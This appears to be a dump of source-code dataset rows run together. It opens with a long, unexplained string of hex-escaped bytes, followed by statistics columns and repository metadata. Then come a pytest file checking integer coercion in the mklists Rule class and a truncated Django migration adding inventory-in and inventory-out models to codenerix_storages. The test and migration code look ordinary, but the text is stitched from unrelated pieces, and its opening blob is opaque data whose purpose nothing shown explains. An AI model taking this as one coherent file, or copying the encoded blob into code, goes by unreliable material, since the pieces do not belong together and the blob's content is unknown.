\x34\x40\xa5\xec\x88\x8b\xf2\x4b\xcb\x6c\x86\x2f\xb9\x68\xb5\xd2\x82\xc3\x96\x42\x1b\x4f\x9d\x01\xc1\xfc\x83\x4e\x97\x38\xc1\x67\x2b\xf5\xe6\x82\x19\x61\xf5\x7c\xeb\xdb\x55\x6f\xda\x53\x7a\xb8\x59\xd6\x79\x21\x63\xc4\xbb\x8c\x11\x57\x6a\xf5\xd9\x48\x57\xa7\xee\xd0\x5f\x99\x7c\x32\x55\xca\x93\xf3\x9e\xe4\x70\x02\x24\x44\xba\xed\x5d\x5e\x93\x09\xfe\xa6\xb7\x62\xf3\xd4\xbe\x06\x49\x3c\x1f\xeb\x06\xb7\x17\xe7\x26\x5f\x4b\x05\x6a\x67\x24\x42\x8d\xf2\x69\x3f\x9d\x99\xc5\x3a\xa5\x04\x2a\x4f\x82\xb7\x6d\x68\x65\x6d\x1d\x3f\x67\xfb\x01\x6c\xee\x24\xae\x56\x5b\xeb\x9e\x14\x9b\x30\x9d\xc4\x1a\xdd\x1e\xd3\xfe\x99\x7b\x00\x78\x66\x87\xb7\x96\x50\x92\xd3\xff\x11\x3b\xaa\x9e\x99\x70\xaa\xf7\x68\xee\xea\xe6\xe5\x3c\x90\x23\xba\xd1\xde\x58\x78\x34\x18\x5c\x55\xcb\x0d\xd9\x3f\xe8\x0a\x95\x20\xdc\xa9\x90\xdc\xb5\x4b\x07\xb4\xd2\x3e\xf4\x14\xf9\x49\x9e\xc1\xaa\xc4\x33\xd4\xea\x64\x76\x66\x95\xe1\x77\xab\xc2\x51\xfc\x4e\xb4\xdd\x2b\xce\xea\xb4\x67\x23\xae\x68\x1d\x6f\xc2\x98\x11\x61\x47\x70\x87\x40\x59\x65\xfc\x97\xc1\xa2\x95\x07\xac\xde\xf4\xd4\xc4\xea\xc4\x7d\x56\x76\xc6\x5e\xe8\x6d\xb8\x17\x1a\xe0\x51\x78\xbc\x58\x3a\x0c\x0f\xa7\x5d\x9f\xef\x65\x4f\x4a\xb9\xd4\x67\x33\xca\x1a\x5e\xda\x4f\x03\x9d\xaa\x67\xfe\x9e\x2c\xed\x86\x8b\x21\x59\xf0\x31\xa4\xa6\x36\xfe\x03\x3e\x86\xe6\x44\xa9\x06\x2e\xb5\x88\xc9\x84\xfa\xd2\xbe\xf9\xed\x05\xe2\x3a\xc3\x8d\xea\x77\xcc\xca\xf8\x7b\x75\xd9\x2c\x8f\x49\xd6\xa0\xce\xd9\x20\x1d\x01\x12\x46\x27\xf1\xa3\x5b\x9f\xe5\xca\xa4\xe9\x00\x1f\x47\x60\xe9\x99\x6a\x2f\xb4\x4a\xf3\x24\x20\x6a\x75\x97\x45\x62\xc7\xec\xf7\x17\x4f\x8c\xf0\x3d\xa7\x3d\xd4\x31\xf1\x8d\x6a\x42\xee\xe5\x14\xa6\x81\x86\xf9\xd1\x83\x59\x98\xd5\xa5\x83\x9b\x63\xfe\x4b\xf5\xa1\x12\x58\x5e\xd7\x9a\x6e\x4e\x5c\x26\x65\x68\x8c\xb0\xa6\x71\xb8\xfc\xdb\xf9\x0f\x76\xef\xdd\xe6\x42\x4b\x7f\x13\xc2\xe4\xcd\x5d\xb5\x2b\x06\xa7\x17\xd1\xc9\xb3\x36\xb8\xce\xa0\x8f\xfa\x03\xa5\x9b\x2c\x99\x00\xb2\x87\x11\x7f\x66\x86\xf6\xc9\x6b\x7e\x40\xb4\x60\x24\xd2\x3d\x57\x1d\xe4\x67\x23\x95\x25\x36\x6c\x04\x75\x22\xfd\xbd\x1e\x83\xf9\xbf\x21\x7b\x3f\xbb\x88\xa1\x94\xcb\x06\xa0\xc8\x23\x41\x0e\x33\x3d\x42\x51\x7d\x34\xc7\xdf\x68\xb0\xe7\x83\x65\x5c\xa4\xce\x1f\x5d\x91\x97\x0c\xfa\xa9\x68\x14\x28\x3b\xad\xda\xd8\xc2\x22\x65\x94\xaa\x21\x86\x87\xbe\x52\x9a\x3d\xa5\x00\x15\x5b\xc2\x20\x3c\x88\xeb\x68\xdf\x0e\xa2\xa5\x83\x92\xda\x4c\x0c\x21\x78\xe9\xcf\x0d\xd7\xa9\xad\xbc\xbe\xdc\x2a\x96\x84\x47\x8c\x95\x75\x37\xd9\x41\x6f\xea\x29\xa4\xfb\xe0\x8a\xe2\x5d\x9c\xd3\x56\x77\xde\xae\x4c\x51\x53\x93\x75\x67\x9f\xec\xc2\x9c\xd1\x71\xb0\xf8\x66\x08\x09\x40\xef\x92\x63\xe8\x17\x76\xc2\xc8\x2b\xe3\x48\x16\xe4\x6a\x46\x1a\x8b\xad\xc0\x60\xb4\xf0\xa7\x1b\xb2\x99\xe0\x5a\xca\xb0\x91\x77\x8d\xda\x33\xe3\x5b\x14\x32\xb1\x74\x05\x6f\x97\x2b\xd8\x2c\x82\xe0\xd7\xec\x7e\x72\xda\xc3\x06\x6a\xcd\xfa\xfe\xae\x1b\x67\x92\xe8\x8c\xb2\x2f\xec\xc2\x2c\x75\xfa\x8c\x40\x20\x64\xf7\x76\xf3\xfc\xc2\x3b\xe3\x08\x2c\xa6\x82\x02\xc4\x41\xd5\xe0\x26\xed\x00\xe3\x85\x98\xab\x76\x57\xb2\xa2\x09\xcf\xc2\xf1\x90\xf4\x53\xe0\x1d\x3e\xd3\x80\x14\xea\x9e\x4e\x78\x94\x2e\xbc\x8b\xed\x8a\x48\x2b\xd5\xf3\xf0\x88\x18\x28\x08\x99\xf0\x8b\x34\x70\x44\x56\x43\x64\xb8\x5c\xb3\xe1\x01\xc1\x2e\xaa\xa3\x72\xf8\xf2\x7d\x5a\xb5\x3c\xce\x95\xb9\xad\x04\xce\xed\x35\xa4\x6b\xad\x94\xe8\x78\xc2\xed\xe7\x76\x41\x27\x92\x0c\xb9\xe4\x98\x93\x97\x98\xea\xc0\xdc\x64\x85\x91\xfb\xcc\xce\x6d\x89\x93\x00\xad\xf2\xf6\x4d\x3d\x88\x18\x2c\x5e\xca\x5c\x1f\xd1\xd7\x69\xa5\xb3\xfd\xe8\xc5\x7a\x29\x13\xbc\x96\xd7\x2d\x08\xe9\x4c\x10\x6e\x8a\xef\x17\xf3\x1a\x60\x60\xc6\xf4\x18\xea\x74\x46\xf2\x18\xd8\xc8\xbb\xa8\xfa\xd5\x22\x04\xab\x3c\x2b\x36\x37\x36\xae\x40\x69\x11\xc4\x4e\xda\xa7\x14\x29\xaa\xf8\x12\x7b\x5b\x8b\x23\xb5\xf8\x28\xe5\xa7\x96\x04\x80\xd9\xe4\x6a\x10\xa6\xe6\x7e\x1d\xc8\xec\xd1\xcd\xc7\x2a\x25\x6d\x37\xb8\x7a\x37\xd7\x75\xfe\x16\x20\xc5\x53\x04\x23\x6c\x31\xfc\xcb\xd3\x0e\xd4\x57\x1b\xc1\xce\xdb\x37\x89\x35\x5b\x04\x9c\xc0\xe8\x13\x51\x0c\x83\x22\x54\xa2\xe6\xc0\x15\x85\x0b\x23\x77\x59\x46\x27\xec\x5f\x33\xc9\x80\xab\x21\xa4\xd7\x6f\xa4\x5f\xea\x36\x7f\xa5\xff\x65\xb9\x7a\xc0\x7e\xc9\x33\x1a\xa2\xd9\xec\x3d\xe5\xd5\x05\x72\xc9\xc7\xe0\xd5\x26\xc0\xa0\xd4\x11\x3e\xd3\x97\x81\x79\x04\x26\x31\xd0\x27\x3e\x8b\xe6\x2c\x1e\xf6\xaf\xc0\x4c\x48\xb9\x70\xa6\x34\x22\x65\xfd\x25\x14\xce\x46\xf8\xe8\xba\xc3\x52\xa3\x55\xf6\x5c\x31\x50\x5c\x70\x62\x3b\x00\x40\x6e\x8d\x95\xf3\xc0\xd5\x07\x5e\x11\xc8\x56\xef\x21\xa8\xfc\x34\x11\x33\x4d\x84\xaf\xf0\x3c\x29\x9b\x99\x37\xc1\x7a\x3c\xc4\xf1\x04\x1a\xb0\x7f\xec\xee\x1c\x00\xc2\xe3\x3a\x4e\x62\x67\x99\xfb\x16\x7b\x12\xdc\x78\x4f\x87\xd0\xe3\xc1\xf6\x9b\x2f\xfd\xfa\x12\x5d\x52\x68\x53\x87\x06\x58\x42\x54\x49\x49\xc8\x34\x81\xe4\xb5\x56\x45\x06\xa9\x20\x3c\x46\xe1\xe6\x25\x11\xf1\x31\x94\x98\x13\xe6\xed\x72\xc4\x42\xa4\x70\xaf\xd1\x8a\x80\x4c\x6e\xf4\xf2\xa6\xd6\x76\x12\xb3\xeb\xea\xf6\x72\xfb\xaf\x59\xdb\xaa\x1d\x29\x68\x56\x6e\xdf\xca\xe4\x18\x3c\xe7\x3b\x88\x85\x10\x1c\xde\xef\x21\x09\x27\x09\x7b\x73\x1d\xe6\x9d\x0c\xc6\x14\x09\x8c\xf5\x7d\x32\x86\xea\xf8\x2f\x9d\x2d\xc4\x43\x6b\xe6\x7b\x94\xf1\xc6\x0d\x24\x40\x60\x3f\xb0\x17\x34\x8b\xe7\xe1\x52\x3f\x0c\xbc\x2f\x5f\x29\x52\xee\x8c\x27\x75\xcf\x06\x6b\x0c\xd8\x5b\x1c\x08\x78\x57\x11\x6a\xda\x40\x20\x32\x9c\x5a\x40\x71\x22\x4a\xfd\x47\xb9\xd0\x18\x74\x3f\x3b\x31\x37\x10\xe0\x05\xdf\x0d\x63\xfe\xa4\xe3\x08\xca\x79\x90\x23\xdd\x50\xd6\xd0\x98\x38\xd5\xfc\x9f\xec\x0d\x8f\x9f\x2e\x51\xb3\x22\x85\xd3\x8a\xbb\x7a\xfc\x49\x85\x53\x41\x5f\x0f\xdc\x22\xe7\x4d\x56\xad\x94\xe5\x44\x9a\xcd\x55\x6c\x89\xc6\x2e\x3c\x5c\x61\x10\x15\x59\xf4\xb5\x05\xf5\x83\x0d\x13\x9b\xe0\xd8\x31\xa7\xb1\x59\xab\xa5\x69\xd2\xf9\xe8\x9e\x20\xdb\x6d\xc8\x33\x61\x3b\x13\xe7\x62\x2e\xdf\x83\x35\x12\x2f\x19\x2f\x14\x10\x88\xca\xdc\xb8\x11\x25\xd1\xbf\x53\x91\x0f\x7d\x0a\x0c\x48\xb5\x47\x08\x5e\xbf\x66\x23\xd4\x5e\xdb\x5f\x0a\x9e\x3a\xd6\x8a\xf0\x59\xcb\xce\x61\x6a\xdb\xf2\xc8\x2e\x04\x73\xd0\x69\x27\xb5\x5d\xe9\xc5\x44\xae\x7a\x07\x44\x9d\xa1\x75\x6d\xbe\x97\x60\x50\xd4\x5e\x63\x86\xe0\x1f\xf5\x85\x70\x85\x13\x0f\xe3\xd9\x20\x68\xaa\xc2\x43\x43\x2c\xa7\x0a\x9e\x99\x12\xb8\x1a\xd0\xd8\x09\x72\xc4\xbe\x63\xe9\x3a\x78\xa6\x5c\xb6\xb6\x46\x5f\xa7\x96\x5f\xe2\x6d\xe3\x89\x1b\xcf\x42\x2b\x06\xa6\x05\x3b\xc2\x01\x6f\xcc\xe4\x34\x8a\x66\xa9\x82\x64\xba\x27\x66\xc6\x69\x1b\xa2\x05\xda\x89\x5c\x61\xa1\xc3\xf7\xa7\xab\xe6\x8d\x4f\xc1\x53\x9c\xd6\x85\xe3\xb3\x45\x2f\x7d\x27\x17\xd4\x64\x77\xfe\x28\x97\xa7\xf2\x06\xd1\x48\x8b\x37\x7d\x1e\x95\x73\x1a\x2d\xbd\xec\x3f\x86\x55\x28\x6a\xc1\xc4\x46\x2f\x26\xe8\xbc\x95\x5d\x02\x85\xe7\x29\x19\x12\xd2\xa9\xf4\x0c\x55\x9f\x07\x30\xd2\x90\x3e\x0f\x72\xfd\xd9\xfc\x36\x2e\xa0\x0e\x4f\xc9\x65\x2b\x14\xf7\x21\x54\x7a\x1d\x20\x77\xc4\xa1\x65\xa5\xd6\xec\x09\x9c\xf6\x9b\xb8\xb8\x04\x0d\xe4\xf4\xba\xc8\xc4\x67\x86\x2f\x2d\x57\x56\x60\xa5\x1d\x65\x52\x1a\x34\x59\xcf\x58\x93\x41\xdd\x8f\xec\x3d\x05\x4b\x73\xeb\x40\x1f\xce\xf5\x27\x0d\xb3\xd0\xb5\x79\xe6\xfb\x52\xd6\x56\x5b\xc6\x8b\x24\xac\xff\x09\xa6\x50\xa8\xa6\xb6\x75\xfe\xc8\x3c\xaa\xc1\x83\xc9\x05\xa1\x11\x82\x86\x13\xbb\xb6\x37\x70\x6d\xf5\x09\x8a\xf0\x2d\xfd\x1e\xd0\x82\xba\x60\x0b\xed\xa9\x77\x09\x13\x78\xd4\xb7\xfb\xbe\xb1\xe8\x5c\x52\xa0\x09\x5b\x1a\xe1\x86\xb5\xc7\x62\xae\x65\xab\xe5\x39\xc2\x42\x63\x2f\x40\x68\x6e\xd8\xf8\xb9\xe2\xdd\xdf\x45\x79\x88\x92\xce\x73\xc9\x73\xd4\x79\xc4\x6c\x79\xdc\x4a\xfa\x67\x30\x4e\x7c\xaf\x1a\xa9\xd0\x91\xde\xc8\x4c\x55\x3c\xcb\xe2\xa9\x34\x52\xd5\xc5\x55\x2b\x9c\xc1\xaf\xcf\x08\x86\xd5\xd7\xf6\xc8\x05\xd1\x8a\x84\xd3\xf7\x18\xcd\xb8\x7b\x46\x8e\x0b\xe6\xa2\xb9\xf1\x43\x5b\xf5\x99\x82\x2d\xf5\x99\x93\x6c\x77\x2c\x47\x8d\x0f\x8f\xcd\x75\xba\xff\x42\x6a\x2d\x60\xa1\x42\xf1\x91\x51\x23\x2d\x65\xaf\xae\xfc\xea\x7a\x13\x83\x5d\xc1\x7b\xd2\xa5\x59\x9f\x39\xaf\xd3\x73\x72\xf3\x98\x2b\x91\x82\x53\x3e\x6a\xc0\xa7\xf3\x1f\xf2\xcf\xfc\x62\x02\x04\x92\x0c\x18\x16\x25\xac\xf7\xa2\x94\xca\x40\xc7\x24\xd8\x51\xbb\x4c\x02\xd5\xe0\x98\x03\x14\x2c\xed\x3a\x77\x07\x4a\xea\x29\x0c\x19\x81\x51\xa8\xf4\xd9\x0b\xaf\x6f\x72\x43\x6e\x74\x42\x87\xe4\x7c\xc2\xcb\xec\xd9\x36\xad\xfa\x1e\xb9\x3f\xf8\xad\xc0\xb7\x8b\x68\x24\x30\x1c\x08\x74\xe1\x3d\xac\x3f\x78\xd7\x12\x08\x5c\xf3\x16\xbb\x11\xbe\xb1\xc2\x8b\x41\xfe\x36\x76\x64\xa7\xe4\x69\x49\x91\x3b\x01\x09\x1a\xf9\x4a\xe8\x4a\x6d\x51\xb4\x09\xe2\x11\x1e\x0f\x01\x54\x89\xdd\x4c\xde\xd6\x8f\x32\xea\x6f\xca\xc8\xe6\xad\x4a\x11\xac\x74\xdd\x7d\x9a\xee\xd4\x73\xf2\x11\x56\xe1\x9a\xbf\xd3\x5f\xc6\xc2\xe2\x48\xbc\x86\x7f\x9e\x2d\x6d\x92\x91\x96\xd5\xb7\xa9\x56\xc2\xdd\x1d\x5d\x14\xa5\xf0\x49\x2b\x05\x64\x67\x95\xf5\x05\x28\x8f\xa8\x2d\xfc\x85\xb0\x68\x31\xf4\x8b\x10\xe5\xd8\x0c\x1c\xfa\x79\x9f\x8e\x8f\xe5\xc0\x67\xe6\x5c\xc5\xca\x42\xc4\x70\xc8\xe5\x73\x25\xc2\x92\x09\xc2\x4e\x8b\x3a\x6d\x91\x3e\xa9\x15\xe4\xbc\xdf\xf2\x14\x6e\x75\xe8\x23\xc9\x48\xe9\xe6\x24\x66\x9d\x9a\xf0\xed\x27\x67\xcb\xce\xa9\x05\x5a\x91\x0f\x10\xb4\xa8\xc1\xbe\xec\x84\x96\x3f\xd4\xea\x2f\xcc\x37\x78\x74\xdc\x96\xe2\x5c\xfa\x5a\x41\x19\x9f\xc8\xbd\x05\x95\xe6\xc9\x4e\x50\x1b\xd8\x4d\x91\xe5\x07\x11\xf5\xd8\x80\x00\x19\x90\x6c\xf1\xc7\x3a\xa4\x53\xaf\x51\xc7\x24\x97\x15\x9e\x0a\x02\xac\xaf\x4b\x39\x08\xe8\xde\x65\x76\x81\x58\xfd\x4e\xd6\x57\xfa\xa9\xef\xa4\x62\xc3\x55\xcd\x73\x7c\x06\x17\x69\x7e\x13\xe3\x86\x12\x24\x08\x15\x31\x0e\x6f\xa7\xc6\xbc\x07\xe0\x4a\xe3\xfc\xeb\x96\x6c\x05\x3c\x47\xad\xaf\xc9\xa8\xe7\xd1\xe1\xc7\x51\x7d\xb0\xea\xec\x8e\x94\xce\xba\x3f\x48\xc7\xc7\xf9\x69\x32\x58\x08\x48\x01\x50\xec\x68\xb1\x8d\xed\xab\xe3\x49\xc1\xf9\x68\x0d\x64\x48\xca\x81\x86\xe8\x47\x51\x6c\x44\x71\x8d\x7a\x99\x34\xd1\x0a\xae\x60\xe5\x40\x97\x12\xcb\x2f\xa2\x99\x3b\xf0\xd7\x99\xba\x04\x43\xfd\x33\x32\xbf\x04\x7d\xa0\xb4\x0a\xfb\xb9\x86\x07\x29\xde\xf8\x98\x91\x60\x2e\xfc\x36\x40\x15\xb1\x09\xaa\x20\x03\xf3\xb4\xac\x2c\x63\xf0\x56\x8f\xd9\xee\x6a\xe6\x53\xaf\xa8\xf2\xf1\xa5\xfa\x03\xe4\x08\xc6\x5f\x21\x42\xbc\x94\xa1\x62\x59\x5e\x85\xd0\x77\x3e\x6e\x55\x9b\x97\xb0\x86\x8a\x3a\xc8\xe9\xdf\x08\xea\x2f\x6d\x8b\x81\x87\x47\x51\x16\x90\x7e\xd6\x92\xb5\x6a\x6b\xf5\x6d\xb4\xa9\x86\x2f\xdc\xba\x24\x3f\xd4\x15\x52\x78\x21\x59\xf2\x5f\xfc\x67\x6f\x52\x18\x30\x01\x28\xbf\x0a\xb3\x1c\x19\x04\xc6\x38\x89\x8c\x13\x4e\x17\x35\xdd\x39\x0b\x34\x3d\x1a\x5b\x40\x49\xe6\xc4\x4d\xfb\xdc\x00\xd5\x03\xe2\x1c\xaf\xf4\xb2\xe0\x83\xf4\x05\xad\x19\xdd\x3d\x30\x07\x66\x1f\x20\x13\x47\x26\x59\xdd\x3c\x2f\x87\xf6\x68\x36\xb9\x63\xef\xae\x8f\x87\xf4\xb3\x90\x07\x19\x52\x73\xf6\x9a\xdb\xfa\xbe\x23\x06\xeb\xfb\x75\x99\x04\x82\x84\x3d\x51\x2f\x06\x3c\xeb\xe4\x2f\x50\xe7\xfb\x9b\x1e\x6b\x90\xdd\x6d\x28\xe2\x13\x53\xcb\x29\x8d\x2e\x84\x2d\x0f\x8b\x5e\x72\xea\xf1\x8c\x1c\xd2\xda\x7e\x21\xe8\xde\x82\xc0\x39\x22\xcf\x26\xf9\x2c\x3f\x78\x0c\xe5\xc7\x54\x53\x37\x53\x6e\x32\xed\x51\x4f\x4d\x9f\xbd\xb5\x88\x8b\x41\xa6\xe4\xb5\x22\xfa\x95\x91\x18\x9c\xc8\xdc\x18\x5b\x67\x9a\x96\xce\x7e\x0a\xca\xa6\xc6\x2d\xfe\x87\x4b\x50\x53\xb1\xd2\x30\x06\xa7\x5a\x30\x02\x6f\xef\xbf\x95\x37\xa7\x56\xce\x28\xbf\xec\x11\x10\xa0\x96\xc5\x80\xbd\xfa\xa5\xf0\xcb\x58\x6c\x40\x70\x2a\xb0\x62\xdf\xd1\xf4\x32\xde\xc6\xf6\x20\x00\x25\x5d\x62\x72\xf7\x3a\x80\x1f\xc3\x33\x96\xcf\xd3\x3c\x66\x10\x70\x0b\x7e\x31\x3c\xce\x13\xa0\x25\xe9\xd0\xb2\x95\x3c\x2e\x3f\x13\x20\x9d\x70\x01\x9d\x38\xf9\xfd\xa7\x7f\xdf\x58\x34\x09\xd4\xe4\xa9\x57\x8c\x1f\xa5\xf7\xdf\xdf\x78\x92\xde\x63\x6f\x47\xc7\x54\xb1\xf8\xb4\x89\x77\x36\x1a\x9f\xd2\xee\x64\x83\xb5\x4d\x33\xa0\x5c\x08\xa3\x86\x5f\xf6\x00\x51\xe6\x09\x33\xdb\x42\xdb\x0e\x53\xdb\xbd\x40\x3a\xd5\x25\x82\x74\x9b\xee\xf0\x5a\x68\x10\x03\x2a\x60\x8f\x5e\x9b\xe0\x6c\xe5\x8b\x13\x83\x44\xdf\xa8\xa1\x67\xf5\x40\xeb\x12\xb3\x6a\x50\xac\xe9\xec\xab\xde\xaf\x23\x70\xc0\x86\xe2\xee\xe1\xd0\x70\xa8\x87\xe1\x0f\x0e\x7a\xb7\xfe\x5d\xea\xae\x4e\x56\x66\x49\x98\x48\x8e\xac\x2d', 2) | 8,382.333333 | 25,087 | 0.750229 | 6,274 | 25,147 | 3.004782 | 0.042238 | 0.006047 | 0.006206 | 0.005092 | 0.002069 | 0.001273 | 0.001273 | 0 | 0 | 0 | 0 | 0.311612 | 0.000398 | 25,147 | 3 | 25,087 | 8,382.333333 | 0.438358 | 0 | 0 | 0 | 0 | 0.333333 | 0.996103 | 0.996103 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 11 |
32eb57dd3067d50da4aa69fe2fbb158272472591 | 1,300 | py | Python | tests/rules/test_ruleclass__coerce_target_sortorder_as_integer.py | tombaker/mklists | 1a4150d5cc2df81604fbfbb2dbad2bd74d405a5f | [
"MIT"
] | 1 | 2018-07-25T13:22:31.000Z | 2018-07-25T13:22:31.000Z | tests/rules/test_ruleclass__coerce_target_sortorder_as_integer.py | tombaker/mklists | 1a4150d5cc2df81604fbfbb2dbad2bd74d405a5f | [
"MIT"
] | 8 | 2015-03-14T06:40:24.000Z | 2019-09-04T11:40:22.000Z | tests/rules/test_ruleclass__coerce_target_sortorder_as_integer.py | tombaker/mklists | 1a4150d5cc2df81604fbfbb2dbad2bd74d405a5f | [
"MIT"
] | null | null | null | """Coerce strings of YAML origin to required types."""
import pytest
from mklists.rules import Rule
def test_coerce_target_sortorder_as_integer():
"""Field 1 (target_sortorder) must be an integer."""
rule_obj = Rule(1, "NOW", "a", "b", 2)
rule_obj._coerce_target_sortorder_as_integer()
assert isinstance(rule_obj.target_sortorder, int)
def test_coerce_target_sortorder_as_integer_given_good_string():
"""Field 1 (target_sortorder) must be an integer."""
rule_obj = Rule("1", "NOW", "a", "b", "2")
rule_obj._coerce_target_sortorder_as_integer()
assert isinstance(rule_obj.target_sortorder, int)
assert rule_obj.target_sortorder == 2
def test_coerce_target_sortorder_as_integer_raise_exception_given_bad_string():
"""Field 1 (target_sortorder) must be an integer."""
rule_obj = Rule("1 2", "NOW", "a", "b", "1 2")
with pytest.raises(SystemExit):
rule_obj._coerce_target_sortorder_as_integer()
def test_coerce_target_sortorder_as_integer_raise_exception_given_non_integer():
"""Perversely, int(1.2) evaluates to 1; improbable edge case?"""
rule_obj = Rule(1.2, "NOW", "a", "b", 1.2)
rule_obj._coerce_target_sortorder_as_integer()
assert isinstance(rule_obj.target_sortorder, int)
assert rule_obj.target_sortorder == 1
| 37.142857 | 80 | 0.735385 | 191 | 1,300 | 4.617801 | 0.251309 | 0.272109 | 0.190476 | 0.208617 | 0.803855 | 0.803855 | 0.803855 | 0.678005 | 0.678005 | 0.678005 | 0 | 0.018002 | 0.145385 | 1,300 | 34 | 81 | 38.235294 | 0.775878 | 0.190769 | 0 | 0.35 | 0 | 0 | 0.02729 | 0 | 0 | 0 | 0 | 0 | 0.25 | 1 | 0.2 | false | 0 | 0.1 | 0 | 0.3 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
32eefefca6e6295a1498f543cc2c3f8352b01438 | 7,722 | py | Python | codenerix_storages/migrations/0013_auto_20180216_1444.py | codenerix/django-codenerix-storages | bd77bde0cc26a72b892fb5d8e98f20587bb93415 | [
"Apache-2.0"
] | 1 | 2017-11-23T13:28:47.000Z | 2017-11-23T13:28:47.000Z | codenerix_storages/migrations/0013_auto_20180216_1444.py | codenerix/django-codenerix-storages | bd77bde0cc26a72b892fb5d8e98f20587bb93415 | [
"Apache-2.0"
] | null | null | null | codenerix_storages/migrations/0013_auto_20180216_1444.py | codenerix/django-codenerix-storages | bd77bde0cc26a72b892fb5d8e98f20587bb93415 | [
"Apache-2.0"
] | 2 | 2018-05-15T10:15:26.000Z | 2018-05-22T10:01:40.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.10.8 on 2018-02-16 13:44
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('codenerix_invoicing', '0013_salesorderdocument_removed'),
('codenerix_products', '0011_auto_20180202_0826'),
('codenerix_storages', '0012_inventory_kind'),
]
operations = [
migrations.CreateModel(
name='InventoryIn',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Created')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Updated')),
('end', models.DateTimeField(blank=True, editable=False, null=True, verbose_name='Ends')),
('provider', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='inventorys', to='codenerix_invoicing.Provider', verbose_name='Provider')),
],
options={
'abstract': False,
'default_permissions': ('add', 'change', 'delete', 'view', 'list'),
},
),
migrations.CreateModel(
name='InventoryInLine',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Created')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Updated')),
('product_unique_value', models.CharField(blank=True, default=None, editable=False, max_length=80, null=True, verbose_name='Product Unique Value')),
('quantity', models.FloatField(default=1.0, verbose_name='Quantity')),
('caducity', models.DateField(blank=True, default=None, null=True, verbose_name='Caducity')),
('box', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='storage_inventoryinline', to='codenerix_storages.StorageBox', verbose_name='Box')),
('inventory', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='inventory_lines', to='codenerix_storages.InventoryIn', verbose_name='Inventory line')),
('operator', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='storage_inventoryinline', to='codenerix_storages.StorageOperator', verbose_name='Storage Operator')),
('product_final', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='storage_inventoryinline', to='codenerix_products.ProductFinal', verbose_name='Product Final')),
('product_unique', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='storage_inventoryinline', to='codenerix_products.ProductUnique', verbose_name='Product Unique')),
],
options={
'abstract': False,
'default_permissions': ('add', 'change', 'delete', 'view', 'list'),
},
),
migrations.CreateModel(
name='InventoryOut',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Created')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Updated')),
('end', models.DateTimeField(blank=True, editable=False, null=True, verbose_name='Ends')),
('order', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='inventorys', to='codenerix_invoicing.SalesOrder', verbose_name='Order')),
],
options={
'abstract': False,
'default_permissions': ('add', 'change', 'delete', 'view', 'list'),
},
),
migrations.CreateModel(
name='InventoryOutLine',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Created')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Updated')),
('product_unique_value', models.CharField(blank=True, default=None, editable=False, max_length=80, null=True, verbose_name='Product Unique Value')),
('quantity', models.FloatField(default=1.0, verbose_name='Quantity')),
('box', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='storage_inventoryoutline', to='codenerix_storages.StorageBox', verbose_name='Box')),
('inventory', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='inventory_lines', to='codenerix_storages.InventoryOut', verbose_name='Inventory line')),
('operator', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='storage_inventoryoutline', to='codenerix_storages.StorageOperator', verbose_name='Storage Operator')),
('product_final', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='storage_inventoryoutline', to='codenerix_products.ProductFinal', verbose_name='Product Final')),
('product_unique', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='storage_inventoryoutline', to='codenerix_products.ProductUnique', verbose_name='Product Unique')),
],
options={
'abstract': False,
'default_permissions': ('add', 'change', 'delete', 'view', 'list'),
},
),
migrations.RemoveField(
model_name='inventory',
name='kind',
),
migrations.RemoveField(
model_name='inventory',
name='name',
),
migrations.RemoveField(
model_name='inventory',
name='start',
),
migrations.AlterField(
model_name='inventory',
name='end',
field=models.DateTimeField(blank=True, editable=False, null=True, verbose_name='Ends'),
),
migrations.AlterField(
model_name='inventoryline',
name='box',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='storage_inventoryline', to='codenerix_storages.StorageBox', verbose_name='Box'),
),
migrations.AlterField(
model_name='inventoryline',
name='operator',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='storage_inventoryline', to='codenerix_storages.StorageOperator', verbose_name='Storage Operator'),
),
migrations.AlterField(
model_name='inventoryline',
name='product_final',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='storage_inventoryline', to='codenerix_products.ProductFinal', verbose_name='Product Final'),
),
